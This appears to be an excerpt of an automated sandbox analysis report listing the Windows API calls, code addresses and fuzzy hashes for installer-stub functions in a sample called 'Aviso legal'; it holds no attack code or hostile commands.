                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                • String ID:
                                • API String ID: 2584051700-0
                                • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                APIs
                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: MessageSend$Timeout
                                • String ID: !
                                • API String ID: 1777923405-2657877971
                                • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                APIs
                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                • wsprintfW.USER32 ref: 00404DF0
                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: ItemTextlstrlenwsprintf
                                • String ID: %u.%u%s%s
                                • API String ID: 3540041739-3551169577
                                • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                APIs
                                • CreateDirectoryW.KERNEL32(?,?,00442800), ref: 00405AB1
                                • GetLastError.KERNEL32 ref: 00405AC5
                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                • GetLastError.KERNEL32 ref: 00405AE4
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                • String ID:
                                • API String ID: 3449924974-0
                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                APIs
                                • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                • GetTickCount.KERNEL32 ref: 0040304A
                                • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                • String ID:
                                • API String ID: 2102729457-0
                                • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                APIs
                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70, 4u,?,00442800,00405C69,?,75E03420,00442800,00000000), ref: 00405EC5
                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70, 4u,?,00442800,00405C69,?,75E03420,00442800,00000000), ref: 00405F6D
                                • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 4u,?,00442800,00405C69,?,75E03420,00442800), ref: 00405F7D
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                • String ID: 4u
                                • API String ID: 3248276644-3553953750
                                • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                APIs
                                • IsWindowVisible.USER32(?), ref: 00405542
                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Window$CallMessageProcSendVisible
                                • String ID:
                                • API String ID: 3748168415-3916222277
                                • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                APIs
                                • GetTickCount.KERNEL32 ref: 0040607A
                                • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,?,0040352B,00442000,00442800,00442800,00442800,00442800,00442800,00442800,00403810), ref: 00406095
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CountFileNameTempTick
                                • String ID: nsa
                                • API String ID: 1716503409-2209301699
                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                APIs
                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: lstrlen$CharNextlstrcmpi
                                • String ID:
                                • API String ID: 190613189-0
                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9